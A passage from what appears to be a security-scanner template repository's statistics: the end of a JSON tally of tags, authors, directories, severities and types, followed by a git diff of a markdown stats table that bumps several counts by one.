av","count":1},{"name":"nette","count":1},{"name":"mojoauth","count":1},{"name":"web-dispatcher","count":1},{"name":"zendframework","count":1},{"name":"droneci","count":1},{"name":"ray","count":1},{"name":"asgaros-forum","count":1},{"name":"bing","count":1},{"name":"vivotex","count":1},{"name":"bhagavadgita","count":1},{"name":"orbintelligence","count":1},{"name":"dqs","count":1},{"name":"noescape","count":1},{"name":"fullhunt","count":1},{"name":"pendo","count":1},{"name":"comfortel","count":1},{"name":"curcy","count":1},{"name":"omni","count":1},{"name":"ejs","count":1},{"name":"alltube","count":1},{"name":"malshare","count":1},{"name":"rollupjs","count":1},{"name":"hotel","count":1},{"name":"route","count":1},{"name":"exposures","count":1},{"name":"gridx","count":1},{"name":"clickup","count":1},{"name":"lokalise","count":1},{"name":"bitdefender","count":1},{"name":"fedora","count":1},{"name":"xlight","count":1},{"name":"cloudron","count":1},{"name":"ntopng","count":1},{"name":"doh","count":1},{"name":"bullwark","count":1},{"name":"zenphoto","count":1},{"name":"jmeter","count":1},{"name":"jsonbin","count":1},{"name":"editor","count":1},{"name":"teradici","count":1},{"name":"api2convert","count":1},{"name":"ipdiva","count":1},{"name":"arl","count":1},{"name":"opensso","count":1},{"name":"vertex","count":1},{"name":"gerapy","count":1},{"name":"tracer","count":1},{"name":"karel","count":1},{"name":"lvm","count":1},{"name":"smi","count":1},{"name":"acontent","count":1},{"name":"totaljs","count":1},{"name":"eyou","count":1},{"name":"shell","count":1},{"name":"arprice-responsive-pricing-table","count":1},{"name":"sh","count":1},{"name":"issabel","count":1},{"name":"amt","count":1},{"name":"dericam","count":1},{"name":"schneider","count":1},{"name":"envoy","count":1},{"name":"jsapi","count":1},{"name":"idera","count":1},{"name":"fortilogger","count":1},{"name":"zerodium","count":1},{"name":"asa","count":1},{"name":"razor","count":1},{"name":"atlantis","count":1},{"name":"webpconverter","count":1},{"name":"web3","count":1},{"name":"monitorix","count":1},{"name":"twig","count":1},{"name":"pfblockerng","count":1},{"name":"jeecg-boot","count":1},{"name":"clickhouse","count":1},{"name":"cdi","count":1},{"name":"b2evolution","count":1},{"name":"directorist","count":1},{"name":"asanhamayesh","count":1},{"name":"jalios","count":1},{"name":"noptin","count":1},{"name":"nodebb","count":1},{"name":"exolis","count":1},{"name":"hangfire","count":1},{"name":"parentlink","count":1},{"name":"stestr","count":1},{"name":"msmtp","count":1},{"name":"zzzphp","count":1},{"name":"connect-central","count":1},{"name":"catalogcreater","count":1},{"name":"concourse","count":1},{"name":"jaspersoft","count":1},{"name":"vault","count":1},{"name":"qvisdvr","count":1},{"name":"alumni","count":1},{"name":"domos","count":1},{"name":"projector","count":1},{"name":"coinapi","count":1},{"name":"postgresql","count":1},{"name":"terraboard","count":1},{"name":"easy-student-results","count":1},{"name":"sls","count":1},{"name":"openedx","count":1},{"name":"blue-ocean","count":1},{"name":"kerio","count":1},{"name":"oam","count":1},{"name":"cpanel","count":1},{"name":"ez","count":1},{"name":"tpshop","count":1},{"name":"messenger","count":1},{"name":"management","count":1},{"name":"ind780","count":1},{"name":"timeclock","count":1},{"name":"daybyday","count":1},{"name":"europeana","count":1},{"name":"groupoffice","count":1},{"name":"calendly","count":1},{"name":"formalms","count":1},{"name":"locust","count":1},{"name":"i3geo","count":1},{"name":"xfinity","count":1},{"name":"jhipster","count":1},{"name":"shopware","count":1},{"name":"mofi","count":1},{"name":"uvdesk","count":1},{"name":"zm","count":1},{"name":"ocs-inventory","count":1},{"name":"atvise","count":1},{"name":"siebel","count":1},{"name":"zuul","count":1},{"name":"screenshot","count":1},{"name":"gloo","count":1},{"name":"goip","count":1},{"name":"lfw","count":1},{"name":"micro-user-service","count":1},{"name":"email","count":1},{"name":"mastodon","count":1},{"name":"crystal","count":1},{"name":"dicoogle","count":1},{"name":"jinher","count":1},{"name":"privatekey","count":1},{"name":"billquick","count":1},{"name":"duplicator","count":1},{"name":"flyteconsole","count":1},{"name":"grails","count":1},{"name":"stem","count":1},{"name":"fusion","count":1},{"name":"xenforo","count":1},{"name":"cofax","count":1},{"name":"clockwork","count":1},{"name":"wondercms","count":1},{"name":"deviantart","count":1},{"name":"smf","count":1},{"name":"landray","count":1},{"name":"nagvis","count":1},{"name":"ubiquiti","count":1},{"name":"dbt","count":1},{"name":"mod-proxy","count":1},{"name":"opm","count":1},{"name":"debounce","count":1},{"name":"limesurvey","count":1},{"name":"thecatapi","count":1},{"name":"pricing-deals-for-woocommerce","count":1},{"name":"honeywell","count":1},{"name":"easyscripts","count":1},{"name":"xeams","count":1},{"name":"ethereum","count":1},{"name":"userstack","count":1},{"name":"inetutils","count":1},{"name":"wms","count":1},{"name":"fastvue","count":1},{"name":"aveva","count":1},{"name":"huijietong","count":1},{"name":"interlib","count":1},{"name":"roundcube","count":1},{"name":"justwriting","count":1},{"name":"datahub","count":1},{"name":"netmask","count":1},{"name":"juddi","count":1},{"name":"encompass","count":1},{"name":"ewebs","count":1},{"name":"ninja","count":1},{"name":"xproxy","count":1},{"name":"turnkey","count":1},{"name":"cvent","count":1},{"name":"mag","count":1},{"name":"airee","count":1},{"name":"gemfury","count":1},{"name":"metaview","count":1},{"name":"dnssec","count":1},{"name":"amcrest","count":1},{"name":"codis","count":1},{"name":"cloudcenter","count":1},{"name":"zenario","count":1},{"name":"gorest","count":1},{"name":"wget","count":1},{"name":"h2","count":1},{"name":"qibocms","count":1},{"name":"place","count":1},{"name":"dribbble","count":1},{"name":"qlik","count":1},{"name":"sentinelone","count":1},{"name":"wakatime","count":1},{"name":"thedogapi","count":1},{"name":"misconfiguration","count":1},{"name":"bootstrap","count":1},{"name":"buildbot","count":1},{"name":"db2","count":1},{"name":"realteo","count":1},{"name":"rss","count":1},{"name":"xmpp","count":1},{"name":"shopxo","count":1},{"name":"binom","count":1},{"name":"vodafone","count":1},{"name":"deluge","count":1},{"name":"newsletter","count":1},{"name":"babel","count":1},{"name":"abuseipdb","count":1},{"name":"flahscookie","count":1},{"name":"avalanche","count":1},{"name":"simply-schedule-appointments","count":1},{"name":"ddownload","count":1},{"name":"collectd","count":1},{"name":"micro","count":1},{"name":"phpunit","count":1},{"name":"cybrotech","count":1},{"name":"primetek","count":1},{"name":"strava","count":1},{"name":"kodexplorer","count":1},{"name":"creatio","count":1},{"name":"goliath","count":1},{"name":"version","count":1},{"name":"themefusion","count":1},{"name":"huemagic","count":1},{"name":"scalar","count":1},{"name":"kaes","count":1},{"name":"hanwang","count":1},{"name":"bedita","count":1},{"name":"visualstudio","count":1},{"name":"xyxel","count":1},{"name":"exponentcms","count":1},{"name":"dreamweaver","count":1},{"name":"tembosocial","count":1},{"name":"scanii","count":1},{"name":"notebook","count":1},{"name":"openvz","count":1},{"name":"dnn","count":1},{"name":"webftp","count":1},{"name":"narnoo-distributor","count":1},{"name":"cloudconvert","count":1},{"name":"joomsport-sports-league-results-management","count":1},{"name":"cors","count":1},{"name":"hrsale","count":1},{"name":"smartgateway","count":1},{"name":"musicstore","count":1},{"name":"infinitewp","count":1},{"name":"phpfastcache","count":1},{"name":"esmtp","count":1},{"name":"markdown","count":1},{"name":"cve2001","count":1},{"name":"emc","count":1},{"name":"sgp","count":1},{"name":"autocomplete","count":1},{"name":"faust","count":1},{"name":"pippoint","count":1},{"name":"pan","count":1},{"name":"directadmin","count":1},{"name":"netris","count":1},{"name":"burp","count":1},{"name":"pcoweb","count":1},{"name":"wmt","count":1},{"name":"wowza","count":1},{"name":"tooljet","count":1},{"name":"memcached","count":1},{"name":"wavemaker","count":1},{"name":"domino","count":1},{"name":"kivicare-clinic-management-system","count":1},{"name":"zarafa","count":1},{"name":"aquasec","count":1},{"name":"wazuh","count":1},{"name":"expressjs","count":1},{"name":"tamronos","count":1},{"name":"basic-auth","count":1},{"name":"cloudfoundry","count":1},{"name":"lanproxy","count":1},{"name":"apigee","count":1},{"name":"x-ui","count":1},{"name":"vsphere","count":1},{"name":"ecom","count":1}],"authors":[{"name":"dhiyaneshdk","count":708},{"name":"daffainfo","count":662},{"name":"pikpikcu","count":344},{"name":"pdteam","count":273},{"name":"geeknik","count":220},{"name":"ricardomaia","count":210},{"name":"pussycat0x","count":181},{"name":"0x_akoko","count":171},{"name":"dwisiswant0","count":171},{"name":"ritikchaddha","count":167},{"name":"princechaddha","count":154},{"name":"gy741","count":137},{"name":"arafatansari","count":112},{"name":"tess","count":86},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":62},{"name":"akincibor","count":55},{"name":"theamanrawat","count":51},{"name":"for3stco1d","count":50},{"name":"gaurang","count":42},{"name":"philippedelteil","count":39},{"name":"edoardottt","count":36},{"name":"c-sh0","count":34},{"name":"righettod","count":33},{"name":"adam crosser","count":31},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"hardik-solanki","count":23},{"name":"ffffffff0x","count":22},{"name":"techbrunchfr","count":21},{"name":"cckuailong","count":18},{"name":"sullo","count":17},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"r3dg33k","count":14},{"name":"milo2012","count":14},{"name":"johnk3r","count":14},{"name":"tenbird","count":13},{"name":"0ri2n","count":13},{"name":"sharath","count":13},{"name":"random-robbie","count":13},{"name":"melbadry9","count":12},{"name":"suman_kar","count":12},{"name":"wdahlenb","count":11},{"name":"dogasantos","count":11},{"name":"cyllective","count":11},{"name":"elsfa7110","count":11},{"name":"alph4byt3","count":10},{"name":"meme-lord","count":10},{"name":"random_robbie","count":10},{"name":"nadino","count":10},{"name":"logicalhunter","count":10},{"name":"hackergautam","count":10},{"name":"0x240x23elu","count":9},{"name":"oppsec","count":9},{"name":"emadshanab","count":9},{"name":"zh","count":8},{"name":"lu4nx","count":8},{"name":"veshraj","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"kophjager007","count":7},{"name":"divya_mudgal","count":7},{"name":"its0x08","count":7},{"name":"leovalcante","count":7},{"name":"theabhinavgaur","count":7},{"name":"harshbothra_","count":7},{"name":"randomstr1ng","count":7},{"name":"_0xf4n9x_","count":7},{"name":"caspergn","count":7},{"name":"techryptic (@tech)","count":7},{"name":"amit-jd","count":7},{"name":"dr_set","count":7},{"name":"forgedhallpass","count":6},{"name":"iamnoooob","count":6},{"name":"nullfuzz","count":6},{"name":"rootxharsh","count":6},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"evan rubinstein","count":6},{"name":"pentest_swissky","count":6},{"name":"pathtaga","count":6},{"name":"imnightmaree","count":6},{"name":"gitlab red team","count":6},{"name":"robotshell","count":5},{"name":"clem9669","count":5},{"name":"xelkomy","count":5},{"name":"ganofins","count":5},{"name":"nodauf","count":5},{"name":"0xlittleboy","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"prajiteshsingh","count":5},{"name":"joanbono","count":5},{"name":"podalirius","count":5},{"name":"dadevel","count":4},{"name":"incogbyte","count":4},{"name":"e_schultze_","count":4},{"name":"shine","count":4},{"name":"dolev farhi","count":4},{"name":"wisnupramoedya","count":4},{"name":"scent2d","count":4},{"name":"r3naissance","count":4},{"name":"3th1c_yuk1","count":4},{"name":"defr0ggy","count":4},{"name":"s0obi","count":4},{"name":"powerexploit","count":4},{"name":"tanq16","count":4},{"name":"h1ei1","count":4},{"name":"thomas_from_offensity","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"z3bd","count":3},{"name":"unstabl3","count":3},{"name":"swissky","count":3},{"name":"mavericknerd","count":3},{"name":"davidmckennirey","count":3},{"name":"andydoering","count":3},{"name":"johnjhacking","count":3},{"name":"ekrause","count":3},{"name":"splint3r7","count":3},{"name":"dudez","count":3},{"name":"f1tz","count":3},{"name":"dr0pd34d","count":3},{"name":"kh4sh3i","count":3},{"name":"atomiczsec","count":3},{"name":"huowuzhao","count":3},{"name":"_generic_human_","count":3},{"name":"whoever","count":3},{"name":"emenalf","count":3},{"name":"ambassify","count":3},{"name":"fyoorer","count":3},{"name":"skeltavik","count":3},{"name":"ph33r","count":3},{"name":"evergreencartoons","count":3},{"name":"shifacyclewala","count":3},{"name":"me9187","count":3},{"name":"supras","count":3},{"name":"hahwul","count":3},{"name":"sushantkamble","count":3},{"name":"lark-lab","count":3},{"name":"alifathi-h1","count":3},{"name":"mr-xn","count":3},{"name":"0w4ys","count":3},{"name":"binaryfigments","count":3},{"name":"fxploit","count":3},{"name":"arcc","count":3},{"name":"impramodsargar","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"lucasljm2001","count":3},{"name":"jarijaas","count":3},{"name":"foulenzer","count":2},{"name":"uomogrande","count":2},{"name":"convisoappsec","count":2},{"name":"nuk3s3c","count":2},{"name":"joeldeleep","count":2},{"name":"ajaysenr","count":2},{"name":"dbrwsky","count":2},{"name":"ree4pwn","count":2},{"name":"clarkvoss","count":2},{"name":"codexlynx","count":2},{"name":"thezakman","count":2},{"name":"redteambrasil","count":2},{"name":"pxmme1337","count":2},{"name":"0xsapra","count":2},{"name":"g4l1t0","count":2},{"name":"8arthur","count":2},{"name":"y4er","count":2},{"name":"cckuakilong","count":2},{"name":"sy3omda","count":2},{"name":"cocxanh","count":2},{"name":"paradessia","count":2},{"name":"randomrobbie","count":2},{"name":"0xsmiley","count":2},{"name":"z0ne","count":2},{"name":"kishore-hariram","count":2},{"name":"w4cky_","count":2},{"name":"fabaff","count":2},{"name":"udit_thakkur","count":2},{"name":"koti2","count":2},{"name":"amsda","count":2},{"name":"0xelkomy","count":2},{"name":"afaq","count":2},{"name":"c3l3si4n","count":2},{"name":"github.com/its0x08","count":2},{"name":"ehsahil","count":2},{"name":"mohammedsaneem","count":2},{"name":"lotusdll","count":2},{"name":"gevakun","count":2},{"name":"kre80r","count":2},{"name":"0xprial","count":2},{"name":"paperpen","count":2},{"name":"0xcrypto","count":2},{"name":"thardt-praetorian","count":2},{"name":"wa1tf0rme","count":2},{"name":"nvn1729","count":2},{"name":"shelled","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"badboycxcc","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"dahse89","count":2},{"name":"geekby","count":2},{"name":"n-thumann","count":2},{"name":"rafaelwdornelas","count":2},{"name":"korteke","count":2},{"name":"bing0o","count":2},{"name":"v0idc0de","count":2},{"name":"moritz nentwig","count":2},{"name":"0xnirvana","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"canberbamber","count":2},{"name":"taielab","count":2},{"name":"vavkamil","count":2},{"name":"true13","count":2},{"name":"bsysop","count":2},{"name":"megamansec","count":2},{"name":"brenocss","count":2},{"name":"nkxxkn","count":2},{"name":"0xrudra","count":2},{"name":"raesene","count":2},{"name":"d4vy","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"joshlarsen","count":2},{"name":"notnotnotveg","count":2},{"name":"manas_harsh","count":2},{"name":"r12w4n","count":2},{"name":"zomsop82","count":2},{"name":"gal nagli","count":2},{"name":"socketz","count":2},{"name":"vsh00t","count":2},{"name":"martincodes-de","count":2},{"name":"danielmofer","count":2},{"name":"x1m_martijn","count":2},{"name":"sinkettu","count":2},{"name":"kiblyn11","count":2},{"name":"sbani","count":2},{"name":"parth","count":2},{"name":"dheerajmadhukar","count":2},{"name":"hackerarpan","count":2},{"name":"bp0lr","count":2},{"name":"666asd","count":2},{"name":"hetroublemakr","count":2},{"name":"nybble04","count":2},{"name":"myztique","count":2},{"name":"bananabr","count":2},{"name":"bernardofsr","count":2},{"name":"luci","count":2},{"name":"k11h-de","count":2},{"name":"smaranchand","count":2},{"name":"aaronchen0","count":1},{"name":"elouhi","count":1},{"name":"lark lab","count":1},{"name":"phyr3wall","count":1},{"name":"clment cruchet","count":1},{"name":"exploitation","count":1},{"name":"ling","count":1},{"name":"ahmetpergamum","count":1},{"name":"ilovebinbash","count":1},{"name":"dale clarke","count":1},{"name":"remonsec","count":1},{"name":"jaskaran","count":1},{"name":"secthebit","count":1},{"name":"mhdsamx","count":1},{"name":"narluin","count":1},{"name":"wlayzz","count":1},{"name":"pjborah","count":1},{"name":"ahmed sherif","count":1},{"name":"rubina119","count":1},{"name":"viondexd","count":1},{"name":"ohlinge","count":1},{"name":"xshuden","count":1},{"name":"vinit989","count":1},{"name":"zsusac","count":1},{"name":"djoevanka","count":1},{"name":"thelicato","count":1},{"name":"retr02332","count":1},{"name":"y0no","count":1},{"name":"skylark-lab","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"d0rkerdevil","count":1},{"name":"blckraven","count":1},{"name":"5up3r541y4n","count":1},{"name":"1nf1n7y","count":1},{"name":"noobexploiter","count":1},{"name":"furkansenan","count":1},{"name":"yashanand155","count":1},{"name":"manuelbua","count":1},{"name":"viniciuspereiras","count":1},{"name":"arall","count":1},{"name":"jcockhren","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"fopina","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"0xceba","count":1},{"name":"dhiyaneshdki","count":1},{"name":"exceed","count":1},{"name":"pascalheidmann","count":1},{"name":"duty_1g","count":1},{"name":"hakimkt","count":1},{"name":"kareemse1im","count":1},{"name":"soyelmago","count":1},{"name":"rotembar","count":1},{"name":"thevillagehacker","count":1},{"name":"rivalsec","count":1},{"name":"sleepingbag945","count":1},{"name":"allenwest24","count":1},{"name":"miroslavsotak","count":1},{"name":"unkl4b","count":1},{"name":"aresx","count":1},{"name":"igibanez","count":1},{"name":"elder tao","count":1},{"name":"lamscun","count":1},{"name":"piyushchhiroliya","count":1},{"name":"shockwave","count":1},{"name":"nagli","count":1},{"name":"akash.c","count":1},{"name":"natto97","count":1},{"name":"pry0cc","count":1},{"name":"tea","count":1},{"name":"lingtren","count":1},{"name":"realexp3rt","count":1},{"name":"willd96","count":1},{"name":"retr0","count":1},{"name":"breno_css","count":1},{"name":"bywalks","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"kabirsuda","count":1},{"name":"kiks7","count":1},{"name":"alex","count":1},{"name":"justmumu","count":1},{"name":"bartu utku sarp","count":1},{"name":"apt-mirror","count":1},{"name":"w0tx","count":1},{"name":"knassar702","count":1},{"name":"bughuntersurya","count":1},{"name":"jna1","count":1},{"name":"co0nan","count":1},{"name":"sherlocksecurity","count":1},{"name":"xstp","count":1},{"name":"noraj","count":1},{"name":"luqman","count":1},{"name":"adrianmf","count":1},{"name":"evolutionsec","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"zhenwarx","count":1},{"name":"brabbit10","count":1},{"name":"miryangjung","count":1},{"name":"open-sec","count":1},{"name":"arm!tage","count":1},{"name":"marcos_iaf","count":1},{"name":"manasmbellani","count":1},{"name":"sickwell","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"jbertman","count":1},{"name":"sshell","count":1},{"name":"coldfish","count":1},{"name":"ooooooo_q","count":1},{"name":"noamrathaus","count":1},{"name":"rodnt","count":1},{"name":"kagamigawa","count":1},{"name":"schniggie","count":1},{"name":"act1on3","count":1},{"name":"lixts","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"0xtavian","count":1},{"name":"ldionmarcil","count":1},{"name":"kailashbohara","count":1},{"name":"stupidfish","count":1},{"name":"iphantasmic","count":1},{"name":"caon","count":1},{"name":"petruknisme","count":1},{"name":"daviey","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"ipanda","count":1},{"name":"0xteles","count":1},{"name":"evan rubinstien","count":1},{"name":"majidmc2","count":1},{"name":"queencitycyber","count":1},{"name":"ramkrishna sawant","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"shivampand3y","count":1},{"name":"yashgoti","count":1},{"name":"rojanrijal","count":1},{"name":"yuansec","count":1},{"name":"0h1in9e","count":1},{"name":"berkdusunur","count":1},{"name":"borna nematzadeh","count":1},{"name":"tirtha","count":1},{"name":"tehtbl","count":1},{"name":"yavolo","count":1},{"name":"ndmalc","count":1},{"name":"luskabol","count":1},{"name":"danigoland","count":1},{"name":"thebinitghimire","count":1},{"name":"alperenkesk","count":1},{"name":"cookiehanhoan","count":1},{"name":"h4kux","count":1},{"name":"ggranjus","count":1},{"name":"affix","count":1},{"name":"osamahamad","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"intx0x80","count":1},{"name":"rschio","count":1},{"name":"0xceeb","count":1},{"name":"shifacyclewla","count":1},{"name":"amanrawat","count":1},{"name":"vzamanillo","count":1},{"name":"dali","count":1},{"name":"p-l-","count":1},{"name":"jbaines-r7","count":1},{"name":"push4d","count":1},{"name":"charanrayudu","count":1},{"name":"philippdelteil","count":1},{"name":"andysvints","count":1},{"name":"kiransau","count":1},{"name":"francescocarlucci","count":1},{"name":"becivells","count":1},{"name":"compr00t","count":1},{"name":"arr0way","count":1},{"name":"akshansh","count":1},{"name":"toufik-airane","count":1},{"name":"fmunozs","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"elitebaz","count":1},{"name":"shiar","count":1},{"name":"0xd0ff9","count":1},{"name":"b4uh0lz","count":1},{"name":"alevsk","count":1},{"name":"un-fmunozs","count":1},{"name":"micha3lb3n","count":1},{"name":"dk999","count":1},{"name":"regala_","count":1},{"name":"deena","count":1},{"name":"sec_hawk","count":1},{"name":"pdp","count":1},{"name":"paper-pen","count":1},{"name":"revblock","count":1},{"name":"aringo","count":1},{"name":"af001","count":1},{"name":"wabafet","count":1},{"name":"whynotke","count":1},{"name":"andirrahmani1","count":1},{"name":"orpheus","count":1},{"name":"lethargynavigator","count":1},{"name":"couskito","count":1},{"name":"f1she3","count":1},{"name":"0xh7ml","count":1},{"name":"hanlaomo","count":1},{"name":"hexcat","count":1},{"name":"furkansayim","count":1},{"name":"carlosvieira","count":1},{"name":"shreyapohekar","count":1},{"name":"rotemreiss","count":1},{"name":"oscarintherocks","count":1},{"name":"ok_bye_now","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"chron0x","count":1},{"name":"aayush vishnoi","count":1},{"name":"exid","count":1},{"name":"ringo","count":1},{"name":"0ut0fb4nd","count":1},{"name":"sicksec","count":1},{"name":"notsoevilweasel","count":1},{"name":"houdinis","count":1},{"name":"ayadi","count":1},{"name":"0xrod","count":1},{"name":"sak1","count":1},{"name":"_darrenmartyn","count":1},{"name":"fq_hsu","count":1},{"name":"shelld3v","count":1},{"name":"mah3sec_","count":1},{"name":"makyotox","count":1},{"name":"bjhulst","count":1},{"name":"mukundbhuva","count":1},{"name":"s1r1u5_","count":1},{"name":"zinminphy0","count":1},{"name":"anon-artist","count":1},{"name":"streetofhackerr007","count":1},{"name":"jonathanwalker","count":1},{"name":"_c0wb0y_","count":1},{"name":"flag007","count":1},{"name":"droberson","count":1},{"name":"ola456","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"spac3wh1te","count":1},{"name":"nytr0gen","count":1},{"name":"tirtha_mandal","count":1},{"name":"juicypotato1","count":1},{"name":"alexrydzak","count":1},{"name":"jteles","count":1},{"name":"luqmaan hadia","count":1},{"name":"httpvoid","count":1},{"name":"qlkwej","count":1},{"name":"gboddin","count":1},{"name":"husain","count":1},{"name":"mesaglio","count":1},{"name":"maximus decimus","count":1},{"name":"jaimin gondaliya","count":1},{"name":"patralos","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"ph33rr","count":1},{"name":"florianmaak","count":1},{"name":"udinchan","count":1},{"name":"jeya.seelan","count":1},{"name":"erethon","count":1},{"name":"tim_koopmans","count":1},{"name":"imhunterand","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"ofjaaah","count":1},{"name":"momen eldawakhly","count":1},{"name":"dievus","count":1},{"name":"nerrorsec","count":1},{"name":"undefl0w","count":1},{"name":"screamy","count":1},{"name":"_harleo","count":1},{"name":"2rs3c","count":1},{"name":"x6263","count":1},{"name":"prettyboyaaditya","count":1},{"name":"8authur","count":1},{"name":"mubassirpatel","count":1},{"name":"th3.d1p4k","count":1},{"name":"amnotacat","count":1},{"name":"pudsec","count":1},{"name":"opencirt","count":1},{"name":"nielsing","count":1},{"name":"nobody","count":1},{"name":"jas37","count":1},{"name":"jiheon-dev","count":1},{"name":"infosecsanyam","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"jeya seelan","count":1},{"name":"xeldax","count":1},{"name":"arjunchandarana","count":1},{"name":"davidfegyver","count":1},{"name":"ahmed abou-ela","count":1},{"name":"mantissts","count":1},{"name":"bad5ect0r","count":1},{"name":"ptonewreckin","count":1},{"name":"mrcl0wnlab","count":1},{"name":"liquidsec","count":1},{"name":"official_blackhat13","count":1},{"name":"hardik-rathod","count":1},{"name":"jrolf","count":1},{"name":"mass0ma","count":1},{"name":"zandros0","count":1},{"name":"izn0u","count":1},{"name":"lrtk-coder","count":1},{"name":"daffianfo","count":1},{"name":"dawid-czarnecki","count":1},{"name":"kr1shna4garwal","count":1},{"name":"failopen","count":1},{"name":"absshax","count":1},{"name":"j33n1k4","count":1},{"name":"b0yd","count":1},{"name":"b0rn2r00t","count":1},{"name":"kaizensecurity","count":1},{"name":"iampritam","count":1},{"name":"mihhailsokolov","count":1},{"name":"elmahdi","count":1},{"name":"th3r4id","count":1},{"name":"harshinsecurity","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"calumjelrick","count":1},{"name":"omarkurt","count":1},{"name":"pratik khalane","count":1},{"name":"ransomsec","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"udyz","count":1},{"name":"geraldino2","count":1},{"name":"hakluke","count":1},{"name":"kurohost","count":1}],"directory":[{"name":"cves","count":1552},{"name":"exposed-panels","count":805},{"name":"technologies","count":529},{"name":"vulnerabilities","count":528},{"name":"misconfiguration","count":372},{"name":"exposures","count":325},{"name":"token-spray","count":237},{"name":"workflows","count":190},{"name":"default-logins","count":122},{"name":"file","count":78},{"name":"network","count":70},{"name":"takeovers","count":68},{"name":"iot","count":45},{"name":"miscellaneous","count":27},{"name":"cnvd","count":25},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"ssl","count":8},{"name":"headless","count":7}],"severity":[{"name":"info","count":1919},{"name":"high","count":1170},{"name":"medium","count":849},{"name":"critical","count":568},{"name":"low","count":294},{"name":"unknown","count":26}],"types":[{"name":"http","count":4631},{"name":"network","count":84},{"name":"file","count":78},{"name":"dns","count":17}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 1bc47cd208..5c507dbd71 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,17 +1,17 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------------------------------|-------|-------------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1575 | dhiyaneshdk | 707 | cves | 1552 | info | 1919 | http | 4630 | -| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1169 | network | 84 | +| cve | 1575 | dhiyaneshdk | 708 | cves | 1552 | info | 1919 | http | 4631 | +| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1170 | network | 84 | | wordpress | 684 | pikpikcu | 344 | technologies | 529 | medium | 849 | file | 78 | | edb | 583 | pdteam | 273 | vulnerabilities | 528 | critical | 568 | dns | 17 | -| wp-plugin | 579 | geeknik | 220 | misconfiguration | 371 | low | 294 | | | +| wp-plugin | 579 | geeknik | 220 | misconfiguration | 372 | low | 294 | | | | exposure | 573 | ricardomaia | 210 | exposures | 325 | unknown | 26 | | | | tech | 567 | pussycat0x | 181 | token-spray | 237 | | | | | -| xss | 548 | dwisiswant0 | 171 | workflows | 190 | | | | | +| xss | 549 | dwisiswant0 | 171 | workflows | 190 | | | | | | lfi | 522 | 0x_akoko | 171 | default-logins | 122 | | | | | | cve2021 | 375 | ritikchaddha | 167 | file | 78 | | | | | | rce | 352 | princechaddha | 154 | network | 70 | | | | | -| packetstorm | 294 | gy741 | 137 | takeovers | 68 | | | | | +| packetstorm | 295 | gy741 | 137 | takeovers | 68 | | | | | | cve2022 | 283 | arafatansari | 112 | iot | 45 | | | | | | wpscan | 268 | tess | 86 | miscellaneous | 27 | | | | | | misconfig | 242 | madrobot | 65 | cnvd | 25 | | | | | @@ -33,2321 +33,2322 @@ | sqli | 126 | techbrunchfr | 21 | | | | | | | | authenticated | 124 | cckuailong | 18 | | | | | | | | cve2010 | 111 | sullo | 17 | | | | | | | -| files | 101 | pr3r00t | 15 | | | | | | | -| top-100 | 100 | sheikhrishad | 15 | | | | | | | -| router | 95 | johnk3r | 14 | | | | | | | -| redirect | 91 | r3dg33k | 14 | | | | | | | +| files | 101 | sheikhrishad | 15 | | | | | | | +| top-100 | 100 | pr3r00t | 15 | | | | | | | +| router | 95 | r3dg33k | 14 | | | | | | | +| redirect | 91 | johnk3r | 14 | | | | | | | | login | 89 | milo2012 | 14 | | | | | | | | network | 88 | sharath | 13 | | | | | | | -| token | 76 | random-robbie | 13 | | | | | | | -| devops | 76 | 0ri2n | 13 | | | | | | | -| ssrf | 75 | tenbird | 13 | | | | | | | -| takeover | 74 | suman_kar | 12 | | | | | | | -| cve2017 | 71 | melbadry9 | 12 | | | | | | | -| auth-bypass | 69 | elsfa7110 | 11 | | | | | | | -| cms | 67 | wdahlenb | 11 | | | | | | | -| file | 66 | cyllective | 11 | | | | | | | -| oracle | 63 | dogasantos | 11 | | | | | | | -| install | 63 | alph4byt3 | 10 | | | | | | | +| devops | 76 | random-robbie | 13 | | | | | | | +| token | 76 | tenbird | 13 | | | | | | | +| ssrf | 75 | 0ri2n | 13 | | | | | | | +| takeover | 74 | melbadry9 | 12 | | | | | | | +| cve2017 | 71 | 